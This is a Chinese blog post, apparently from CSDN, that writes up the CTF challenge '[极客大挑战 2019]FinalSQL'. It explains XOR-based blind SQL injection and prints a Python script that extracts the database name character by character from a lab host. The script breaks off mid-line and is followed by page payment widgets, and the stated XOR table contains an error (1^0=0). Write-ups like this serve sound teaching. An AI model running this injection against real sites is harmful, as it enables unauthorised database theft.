[极客大挑战 2019]FinalSQL

这篇博客介绍了在CTF-Web挑战中遇到的FinalSQL问题,实际上是一个数字注入的难题,而非最初的登录框注入假设。通过分析他人的writeup,博主发现并分享了一个相对较冗余但易于理解的exploit,揭示了如何通过盲注技巧找到隐藏的flag。文章提到了利用脚本逐步揭露数据库名和表名的过程,并引用了相关资源作为参考。
摘要由CSDN通过智能技术生成

CTF-Web-[极客大挑战 2019]FinalSQL

本来以为是登录框注入,看别人写的writeup才发现是那几个点击按钮的数字注入。根据提示知道是盲注。

异或'^'是一种数学运算,1^1=0 0^0=0 1^0=0,可以用来进行sql注入。
当两条件相同时(同真同假)结果为假,当两条件不同时(一真一假)结果为真。

从大佬那拿的exp:(较冗余,但更易理解)

import requests
import time

host = "http://d7fe6340-f773-4d67-8be9-aefb87c7a26c.node4.buuoj.cn:81/search.php?"

def getDatabase():  #获取数据库名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            url = host + "id=1^(ascii(substr((select(database())),%d,1))<%d)^1" % (i,mid)
            res = requests.get(url)
            if "others~~~" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值